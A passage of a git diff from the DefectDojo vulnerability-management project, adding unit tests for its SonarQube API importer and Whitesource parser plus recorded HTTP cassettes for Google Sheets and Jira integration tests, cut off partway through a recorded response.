SonarQubeApiImporter.prepare_client(self.test) + + +class TestSonarqubeImporterSelectedSQConfigsNoKey(DojoTestCase): + # Testing case no 7. https://github.com/DefectDojo/django-DefectDojo/pull/4676 without Project key + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_toolConfig2.json', + 'unit_sonarqube_product.json', + 'unit_sonarqube_sqcNoKey.json', + 'unit_sonarqube_sqcWithKey.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test( + engagement=engagement, + api_scan_configuration=Product_API_Scan_Configuration.objects.all().first() + ) + + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_project', dummy_product) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule', dummy_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues', dummy_issues) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', empty_list) + def test_parser(self): + parser = SonarQubeApiImporter() + findings = parser.get_findings(None, self.test) + self.assertEqual(2, len(findings)) + + +class TestSonarqubeImporterSelectedSQConfigsWithKey(DojoTestCase): + # Testing case no 8. https://github.com/DefectDojo/django-DefectDojo/pull/4676 without Project key + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_toolConfig2.json', + 'unit_sonarqube_product.json', + 'unit_sonarqube_sqcNoKey.json', + 'unit_sonarqube_sqcWithKey.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test( + engagement=engagement, + api_scan_configuration=Product_API_Scan_Configuration.objects.all().last() + ) + other_product = Product(name='other product') + other_engagement = Engagement(product=other_product) + self.other_test = Test( + engagement=other_engagement, + api_scan_configuration=Product_API_Scan_Configuration.objects.all().last() + ) + + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_project', dummy_product) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule', dummy_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues', dummy_issues) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', empty_list) + def test_parser(self): + parser = SonarQubeApiImporter() + findings = parser.get_findings(None, self.test) + self.assertEqual(2, len(findings)) + + def test_product_mismatch(self): + with self.assertRaisesRegex(Exception, 'Product API Scan Configuration and Product do not match.'): + SonarQubeApiImporter.prepare_client(self.other_test) + + +class TestSonarqubeImporterExternalRule(DojoTestCase): + # Test that finding governed by a rule without htmlDesc can be imported. + # Custom (user defined) rules may have no htmlDesc field. + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_toolConfig2.json', + 'unit_sonarqube_product.json', + 'unit_sonarqube_sqcNoKey.json', + 'unit_sonarqube_sqcWithKey.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test( + engagement=engagement, + api_scan_configuration=Product_API_Scan_Configuration.objects.all().last() + ) + + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_project', dummy_product) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule', dummy_rule_wo_html_desc) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues', dummy_issues) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', empty_list) + def test_parser(self): + parser = SonarQubeApiImporter() + findings = parser.get_findings(None, self.test) + self.assertEqual(2, len(findings)) + finding = findings[0] + self.assertEqual('Remove this useless assignment to local variable "currentValue".', finding.title) + self.assertEqual(None, finding.cwe) + self.assertEqual('', finding.description) + self.assertEqual('', finding.references) + self.assertEqual('Medium', finding.severity) + self.assertEqual(242, finding.line) + self.assertEqual('internal.dummy.project:src/main/javascript/TranslateDirective.ts', finding.file_path) + + +class TestSonarqubeImporterTwoIssuesNoHotspots(DojoTestCase): + # Testing case no 9. https://github.com/DefectDojo/django-DefectDojo/pull/4107 + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_product.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_project', dummy_product) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule', dummy_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues', dummy_issues) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', empty_list) + def test_parser(self): + parser = SonarQubeApiImporter() + findings = parser.get_findings(None, self.test) + self.assertEqual(2, len(findings)) + + +class TestSonarqubeImporterNoIssuesOneHotspot(DojoTestCase): + # Testing case no 9. https://github.com/DefectDojo/django-DefectDojo/pull/4107 + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_product.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_project', dummy_product) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule', dummy_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues', empty_list) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', dummy_one_hotspot) + def test_parser(self): + parser = SonarQubeApiImporter() + findings = parser.get_findings(None, self.test) + self.assertEqual(1, len(findings)) + + +class TestSonarqubeImporterNoIssuesTwoHotspots(DojoTestCase): + # Testing case no 11. https://github.com/DefectDojo/django-DefectDojo/pull/4107 + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_product.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_project', dummy_product) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule', dummy_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues', empty_list) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', dummy_many_hotspots) + def test_parser(self): + parser = SonarQubeApiImporter() + findings = parser.get_findings(None, self.test) + self.assertEqual(2, len(findings)) + + +class TestSonarqubeImporterTwoIssuesTwoHotspots(DojoTestCase): + # Testing case no 12. https://github.com/DefectDojo/django-DefectDojo/pull/4107 + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_product.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_project', dummy_product) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule', dummy_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues', dummy_issues) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', dummy_many_hotspots) + def test_parser(self): + parser = SonarQubeApiImporter() + findings = parser.get_findings(None, self.test) + self.assertEqual(4, len(findings)) + + +class TestSonarqubeImporterValidateHotspotData(DojoTestCase): + # Testing case no 13. https://github.com/DefectDojo/django-DefectDojo/pull/4107 + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_product.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_project', dummy_product) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule', dummy_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues', empty_list) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', dummy_one_hotspot) + def test_parser(self): + parser = SonarQubeApiImporter() + findings = parser.get_findings(None, self.test) + self.assertEqual(findings[0].title, '"password" detected here, make sure this is not a hard-coded credential.') + self.assertEqual(findings[0].cwe, 798) + self.assertMultiLineEqual( + '**Ask Yourself Whether**' + '\n\n ' + '* Credentials allows access to a sensitive component like a database, a file storage, an API or a service. ' + '\n ' + '* Credentials are used in production environments. ' + '\n ' + '* Application re-distribution is required before updating the credentials. ' + '\n\n' + 'There is a risk if you answered yes to any of those questions.' + '\n\n', + findings[0].description + ) + self.assertEqual(str(findings[0].severity), 'Info') + self.assertMultiLineEqual( + '[CVE-2019-13466](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13466)' + '\n' + '[CVE-2018-15389](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15389)' + '\n' + '[OWASP Top 10 2017 Category A2](https://www.owasp.org/index.php/Top_10-2017_A2-Broken_Authentication)' + '\n' + '[MITRE, CWE-798](http://cwe.mitre.org/data/definitions/798)' + '\n' + '[MITRE, CWE-259](http://cwe.mitre.org/data/definitions/259)' + '\n' + '[CERT, MSC03-J.](https://wiki.sei.cmu.edu/confluence/x/OjdGBQ)' + '\n' + '[SANS Top 25](https://www.sans.org/top25-software-errors/#cat3)' + '\n' + '[Hard Coded Password](http://h3xstream.github.io/find-sec-bugs/bugs.htm#HARD_CODE_PASSWORD)' + '\n', + findings[0].references + ) + self.assertEqual(str(findings[0].file_path), 'internal.dummy.project:spec/support/user_fixture.rb') + self.assertEqual(findings[0].line, 9) + self.assertEqual(findings[0].active, True) + self.assertEqual(findings[0].verified, False) + self.assertEqual(findings[0].false_p, False) + self.assertEqual(findings[0].duplicate, False) + self.assertEqual(findings[0].out_of_scope, False) + self.assertEqual(findings[0].static_finding, True) + self.assertEqual(findings[0].scanner_confidence, 1) + self.assertEqual(str(findings[0].sonarqube_issue), 'AXgm6Z-ophPPY0C1qhRq') diff --git a/unittests/tools/test_whitesource_parser.py b/unittests/tools/test_whitesource_parser.py new file mode 100644 index 00000000000..42fc4a8710f --- /dev/null +++ b/unittests/tools/test_whitesource_parser.py @@ -0,0 +1,35 @@ +from ..dojo_test_case import DojoTestCase, get_unit_tests_path +from dojo.tools.whitesource.parser import WhitesourceParser +from dojo.models import Test + + +class TestWhitesourceParser(DojoTestCase): + + def test_parse_file_with_no_vuln_has_no_findings(self): + testfile = open("unittests/scans/whitesource_sample/okhttp_no_vuln.json") + parser = WhitesourceParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(0, len(findings)) + + def test_parse_file_with_one_vuln_has_one_findings(self): + testfile = open("unittests/scans/whitesource_sample/okhttp_one_vuln.json") + parser = WhitesourceParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(1, len(findings)) + finding = list(findings)[0] + self.assertEqual(1, len(finding.unsaved_vulnerability_ids)) + self.assertEqual("WS-2009-0001", finding.unsaved_vulnerability_ids[0]) + + def test_parse_file_with_multiple_vuln_has_multiple_finding(self): + testfile = open("unittests/scans/whitesource_sample/okhttp_many_vuln.json") + parser = WhitesourceParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(6, len(findings)) + + def test_parse_file_with_multiple_vuln_cli_output(self): + testfile = open( + get_unit_tests_path() + "/scans/whitesource_sample/cli_generated_many_vulns.json" + ) + parser = WhitesourceParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(20, len(findings)) diff --git a/unittests/vcr/google_sheets/GoogleSheetsConfigTestApi.test_config_google_sheets.yaml b/unittests/vcr/google_sheets/GoogleSheetsConfigTestApi.test_config_google_sheets.yaml new file mode 100644 index 00000000000..75253ac96d4 --- /dev/null +++ b/unittests/vcr/google_sheets/GoogleSheetsConfigTestApi.test_config_google_sheets.yaml @@ -0,0 +1,254 @@ +interactions: +- request: + body: assertion=eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJSUzI1NiIsICJraWQiOiAiYWIyZmUxMWMzMmI1NzJjNWNlNzJmMGNhNDMyZDgwODlmYTg1YTUwNyJ9.eyJpYXQiOiAxNjEyNzMyOTA2LCAiZXhwIjogMTYxMjczNjUwNiwgImlzcyI6ICJ0ZXN0LWRvam8tc2hlZXRzQHRlc3QtZG9qby1zaGVldHMuaWFtLmdzZXJ2aWNlYWNjb3VudC5jb20iLCAiYXVkIjogImh0dHBzOi8vb2F1dGgyLmdvb2dsZWFwaXMuY29tL3Rva2VuIiwgInNjb3BlIjogImh0dHBzOi8vd3d3Lmdvb2dsZWFwaXMuY29tL2F1dGgvZHJpdmUgaHR0cHM6Ly93d3cuZ29vZ2xlYXBpcy5jb20vYXV0aC9zcHJlYWRzaGVldHMifQ.PRgJJujIf5UIjaJg7JuiJ1K70Q95MMfC3kklfaezmEjGLhEHCB6yjrqO3Y54ZZm3afHi80KtEsgTlKFi1rHWDeNRI8saih7KrmdbuJA89xJdLv2NW6F7VitW3Suv3ACOr8SujBjhj_oU_lsbTnIYbc59QGXIV1O3pjYKdZ2sLrw3MAmn9HfstrSkYOvyQYbTnG0yBZQft5jZrPqubo07IU6AWt6Tm9e2lgAJq2YNDCG0TdK_nEgsoK6tbr02ThpaBFIsv0AV_vNc-DBpYMis5399FGsSwnw0R0ZNdkpQRXEdwelv8V-_P88bdaYykt9yA1y62IoxoiNZxDq2EYCTIg&grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer + headers: + accept-encoding: + - gzip, deflate + content-type: + - application/x-www-form-urlencoded + user-agent: + - Python-httplib2/0.19.0 (gzip) + method: POST + uri: https://oauth2.googleapis.com/token + response: + body: + string: !!binary | + H4sIAAAAAAAC/x3P226CMAAA0H/ps5qsXKR74xIUMAwQEPZCCinjtlJLEWTZv8/s/MH5AbiqyDQV + YuwJBe/giSE6VAePyYYWknIInatXMnErnVFBkMj6FvcyVMxqKDR28sx5RndX0Di3dBxnt1RdcdY0 + KVncRSkCVAdUMulxjk/pLIWV3q37vX9p/ToK3U+qwk2kY27lsjr4UhWxh/CU4v5QjMC0Rs7sUfve + 1OU54LfGT1BnukeuSZlN6mu7nCUB/QRj51JHXd/5UQIbr75/cDPTk7me0KX8is44sm3Z5SGlORQj + 2AGyspaTqWhfW0lBaAf+64V4MvL6GwRzwsHvHxw4OXcZAQAA + headers: + Alt-Svc: + - h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; + ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" + Cache-Control: + - private + Content-Encoding: + - gzip + Content-Type: + - application/json; charset=UTF-8 + Date: + - Sun, 07 Feb 2021 21:21:46 GMT + Server: + - scaffolding on HTTPServer2 + Transfer-Encoding: + - chunked + Vary: + - Origin + - X-Origin + - Referer + X-Content-Type-Options: + - nosniff + X-Frame-Options: + - SAMEORIGIN + X-XSS-Protection: + - '0' + status: + code: 200 + message: OK +- request: + body: '{"properties": {"title": "Test spreadsheet"}}' + headers: + accept: + - application/json + accept-encoding: + - gzip, deflate + authorization: + - Bearer ya29.c.Kp4B8QeblQISKbptWbIo592e4AzTk425Ccl_8pGKCuu9qJtnTYDAaTXWV6xaXhhVewJw5_P9fPn3Cn7uTGVu3QcAjx--NLiNfRQJZn62ztVoYDY46lN3cRpvtK5_qv5BPCDorpFo8mz6wyla1hNU9jCJ7r83XFefSiwH3t2NUaaILfRjkjNRU2hKfqOrCXAUufs9LbgRHaRFF4JrQnnY2to + content-length: + - '45' + content-type: + - application/json + user-agent: + - (gzip) + x-goog-api-client: + - gdcl/1.12.8 gl-python/3.6.12 + method: POST + uri: https://sheets.googleapis.com/v4/spreadsheets?fields=spreadsheetId&alt=json + response: + body: + string: !!binary | + H4sIAAAAAAAC/6vmUlBQKi4oSk1MKc5ITS3xTFGyUlAyjPLyNLPwL4qsCvGszDZPzIww9YoMKE8L + NfHI0Q0qyA7KCjX3DE2PKolPTVfiquUCAABktQVGAAAA + headers: + Alt-Svc: + - h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; + ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" + Cache-Control: + - private + Content-Encoding: + - gzip + Content-Type: + - application/json; charset=UTF-8 + Date: + - Sun, 07 Feb 2021 21:21:47 GMT + Server: + - ESF + Transfer-Encoding: + - chunked + Vary: + - Origin + - X-Origin + - Referer + X-Frame-Options: + - SAMEORIGIN + X-XSS-Protection: + - '0' + status: + code: 200 + message: OK +- request: + body: null + headers: + accept: + - application/json + accept-encoding: + - gzip, deflate + authorization: + - Bearer ya29.c.Kp4B8QeblQISKbptWbIo592e4AzTk425Ccl_8pGKCuu9qJtnTYDAaTXWV6xaXhhVewJw5_P9fPn3Cn7uTGVu3QcAjx--NLiNfRQJZn62ztVoYDY46lN3cRpvtK5_qv5BPCDorpFo8mz6wyla1hNU9jCJ7r83XFefSiwH3t2NUaaILfRjkjNRU2hKfqOrCXAUufs9LbgRHaRFF4JrQnnY2to + content-length: + - '0' + user-agent: + - (gzip) + x-goog-api-client: + - gdcl/1.12.8 gl-python/3.6.12 + method: GET + uri: https://www.googleapis.com/drive/v3/files/1ZJI68OrYzTIyk7aiX5JYPwfU4Hl-RpkRjU7IUgZt_eg?fields=parents&alt=json + response: + body: + string: !!binary | + H4sIAAAAAAAAAKvmUlAqSCxKzSspVrJSiOZSUFAycPQoN8mpLAzMyjArDM22DAhzVOJSiOWq5QIA + hsITdi0AAAA= + headers: + Alt-Svc: + - h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; + ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" + Cache-Control: + - no-cache, no-store, max-age=0, must-revalidate + Content-Encoding: + - gzip + Content-Security-Policy: + - frame-ancestors 'self' + Content-Type: + - application/json; charset=UTF-8 + Date: + - Sun, 07 Feb 2021 21:21:48 GMT + Expires: + - Mon, 01 Jan 1990 00:00:00 GMT + Pragma: + - no-cache + Server: + - GSE + Transfer-Encoding: + - chunked + Vary: + - Origin + - X-Origin + X-Content-Type-Options: + - nosniff + X-Frame-Options: + - SAMEORIGIN + X-XSS-Protection: + - 1; mode=block + status: + code: 200 + message: OK +- request: + body: null + headers: + accept: + - application/json + accept-encoding: + - gzip, deflate + authorization: + - Bearer ya29.c.Kp4B8QeblQISKbptWbIo592e4AzTk425Ccl_8pGKCuu9qJtnTYDAaTXWV6xaXhhVewJw5_P9fPn3Cn7uTGVu3QcAjx--NLiNfRQJZn62ztVoYDY46lN3cRpvtK5_qv5BPCDorpFo8mz6wyla1hNU9jCJ7r83XFefSiwH3t2NUaaILfRjkjNRU2hKfqOrCXAUufs9LbgRHaRFF4JrQnnY2to + content-length: + - '0' + user-agent: + - (gzip) + x-goog-api-client: + - gdcl/1.12.8 gl-python/3.6.12 + method: PATCH + uri: https://www.googleapis.com/drive/v3/files/1ZJI68OrYzTIyk7aiX5JYPwfU4Hl-RpkRjU7IUgZt_eg?addParents=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&removeParents=0AHw4lyqQjh6qUk9PVA&fields=id%2C+parents&alt=json + response: + body: + string: !!binary | + H4sIAAAAAAAAAKvmUlDKTFGyUlAyjPLyNLPwL4qsCvGszDZPzIww9YoMKE8LNfHI0Q0qyA7KCjX3 + DE2PKolPTVfSAWorSCxKzSspBuqN5lIA6g+zyKowy0iKCCkM9DZJ9zLN8yw1DwtzCS4zy/DKKwkL + V+JSiOWq5QIASmbU5XIAAAA= + headers: + Alt-Svc: + - h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; + ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" + Cache-Control: + - no-cache, no-store, max-age=0, must-revalidate + Content-Encoding: + - gzip + Content-Security-Policy: + - frame-ancestors 'self' + Content-Type: + - application/json; charset=UTF-8 + Date: + - Sun, 07 Feb 2021 21:21:49 GMT + Expires: + - Mon, 01 Jan 1990 00:00:00 GMT + Pragma: + - no-cache + Server: + - GSE + Transfer-Encoding: + - chunked + Vary: + - Origin + - X-Origin + X-Content-Type-Options: + - nosniff + X-Frame-Options: + - SAMEORIGIN + X-XSS-Protection: + - 1; mode=block + status: + code: 200 + message: OK +- request: + body: null + headers: + accept: + - '*/*' + accept-encoding: + - gzip, deflate + authorization: + - Bearer ya29.c.Kp4B8QeblQISKbptWbIo592e4AzTk425Ccl_8pGKCuu9qJtnTYDAaTXWV6xaXhhVewJw5_P9fPn3Cn7uTGVu3QcAjx--NLiNfRQJZn62ztVoYDY46lN3cRpvtK5_qv5BPCDorpFo8mz6wyla1hNU9jCJ7r83XFefSiwH3t2NUaaILfRjkjNRU2hKfqOrCXAUufs9LbgRHaRFF4JrQnnY2to + content-length: + - '0' + user-agent: + - (gzip) + x-goog-api-client: + - gdcl/1.12.8 gl-python/3.6.12 + method: DELETE + uri: https://www.googleapis.com/drive/v3/files/1ZJI68OrYzTIyk7aiX5JYPwfU4Hl-RpkRjU7IUgZt_eg + response: + body: + string: '' + headers: + Alt-Svc: + - h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; + ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" + Cache-Control: + - no-cache, no-store, max-age=0, must-revalidate + Date: + - Sun, 07 Feb 2021 21:21:49 GMT + Expires: + - Mon, 01 Jan 1990 00:00:00 GMT + Pragma: + - no-cache + Server: + - GSE + Vary: + - Origin + - X-Origin + status: + code: 204 + message: No Content +version: 1 diff --git a/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_create_edit_update_finding_no_push_to_jira.yaml b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_create_edit_update_finding_no_push_to_jira.yaml new file mode 100644 index 00000000000..08ee6878a61 --- /dev/null +++ b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_create_edit_update_finding_no_push_to_jira.yaml @@ -0,0 +1,3613 @@ +interactions: +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPTUvEMBCG/0uuttlJNmm3uYkeVGQV2j2JSNpOsJImpU2FZdn/boKL620+nmde + 5kRaveBhtkSRzxCmRW02PRrsQu+/PNXB6mUZtKMOA8nIN87L4F2EGQCjQCGv97ev9cNLc93u17GN + FVFvCcogg/eM9DhZfxzRheY4YTxwZ/3aR6ldB9v/KkQlQYrL8F6HBHLgLAee86JhTPFSbQUFgBuI + cPQXnGNuM4xXdpsDazgoIRSXdMflH9uNj874CIpCytIwYxDFrqqMFqlHzUpeyGjIksuuKqp/AcGm + hKdh1iS9Y/Rqw7PvdBqfiL1UBN3HoSbn8w8AAAD//wMA1fgHDFoBAAA= + headers: + ATL-TraceId: + - 2dbecacce9ef782f + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:25 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 1aaa4423-1406-4f1c-8898-7e71faf9ce23 + x-envoy-upstream-service-time: + - '37' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + H4sIAAAAAAAAA7SW327aMBTGXyXyNVTdboa47TQJqZqmtuouEJpMOAS3iYNshxZVfZq9z55px7Hj + P8RhHS0XVZXPh5zv9/lgPH8hbEWmRCqqGplTBUUt9vmG8gJW+ERG5BH2xws4rQArbtuK7MqWZFem + BgvyRqq6ItM1LSWMSC1WIOiyBKdwumOFUZRoUJBABfYIlLykjYTv2EqS6dza6XrZVl+1nwV+Ot9A + Rcn0haj9VlvTRhWrtFm5lwqqY0CvryMbCpOygfYVXQqhYrFnWsrujDZMaij+HzTs2P5L8YVFDtCL + nmhLBXDlcNyjZfnRPQ9zvGXHbM0BiW22cGb0jsht6CdUrKU7lLJbq53Dlu+ZSpY31RJEGKuvD2IV + 9QPkQa7uuQvWCe9DSI5I1y3l3ztxAJ3k7a/Z8z0IyWouHUKsWYxv7DnbeXWY5dRp912TNFQIusfG + DEmwnlgvIV3o2xPSohBQ2FMgnrnkkuX98zs79/ylMPtDlzDp4eKz0IH15PQ5/W6s5EYeNPdfegGy + Lhtlds0YjSRr8ibUhv2dOmdBy9QGRI7cJgSqD994WzMoV78+XV5+/uKwUivdoUZFASrDkIQeq4Yr + QbksMa2Vttiv6BIwMB8QQL6et54W+PKoVyoO+zvfmSB5XV1QVVIpGeUXD9t6in9jszxugcdLKqFk + HMYxwQwja/sOBzgZDFCvxAEC19eL4fjM+rnCmwTh6U4fHV3ovgtu4oPz4xhd1Hpy+I3anes+1uva + CrrdUCqH97GDN3jOp1o8CooLDjFULN1PlLIbq52Bz7dM8fQPbF9/cJ1ETCVYHh2AiQW/aa2YqeNc + vUm2Jf/iSsEk3MR3ynDN0+FMq3sGT+2EGa5IskTXqGVOHCZ6y04lf1DDrim81OwFHwnmjir8rL8R + +edu5lpBHL8Jnc5h+uHrUxTejB85K3kCtcG55JSVjiFULMWsokX7IsvwFwAA//+0mVGPmzAMgP8K + 2juotFKl9m2qdtrDaTrd9obugatomx5HUOC07t8vCQ5xSAzcVt4gDtj5bGI73HMNNu0fRaG2594Q + ew9mHPqB/7MjFOVIG1x9qlM0T9M5a2XXFZDACn/WgukqMpCvetlSuWqlchVoCa17WFlfG6fy0nmr + /nNjTSIL0aK68LouRHJlIt+fL3Hjmm+S1YomlpLElASIPZSy7tVuCyCzwqWYpYqZVQNX2eFSHN9e + +a1oXmah5DXsog5MVARIiEldfpxZlXQxlyAm6qXN/v2jbNmxV+yRTmnSa5K0kgDp7PD96/Ovl0h9 + FxE/RQ9MyG1aZp9a9lHqYwg4YPKZu/tlUuP4hMwMn/SwgGHlZfD4OuxRtCmM+bC4tYm0X7SsOu+1 + DqPCqQKNz9bWZ/Lz4YK1tndDA+ChJztibPA3yH8F26sLrR7Zgs4QYIyOuw0Zd0oyiDvdZbMq6nrT + 8Xjz5i4WZ56msCBzb1E8bcLxlFfYjZOhpEKPVV1H7UXRBldgr0Vp65X+Flg/mvv7xw+oCq51sBuq + 0rE641iCh+lI2pKRpCQmu7bqzPmJyzxExM9gxt2jBny+1ZnW1YVvsx+6WQhHRt9IjAXHRK44lTz3 + c/GW5JuSfLXE4VurJUSy/mfv3ZZGcvZmLsQ7RbwHOucDJiqba/M7btSbY/1m7+NLR6CS50BaAlC7 + fwdHXnJlUoClO2EphPoUCKsKkes/3LnkdK8Yu7YbcPT5T0qe/2iJyYb6X0L0yKq3MDh3wlLg9AkQ + VhUCN77bh06A+t8yLjR09jNEsyOhKQlAe84pWiBZCtNOYdI6ZvIhokp2GmVx47HA5ho6O9T3yoSJ + dh5ofd1Bw0TawioZ2NE3f6vyE+ScDjTYCX8RRhHS45gUQuOfKzmP2BU7/wdkZSbzQ156CKZmaSZ/ + AQAA//8Cz3r4QyVpHCrE+Rm/sxGBgDQzBfEvkgDUa45paanJJcW0ncRKBFuSmkLhTBbcjQgfgovU + HGBBg/AjihDUl6CiKDVFAVyiE/AiAAAA//+0WslSwzAM/ZV+AD2EtheuhRM3liOnxMNkOkAIpd+P + 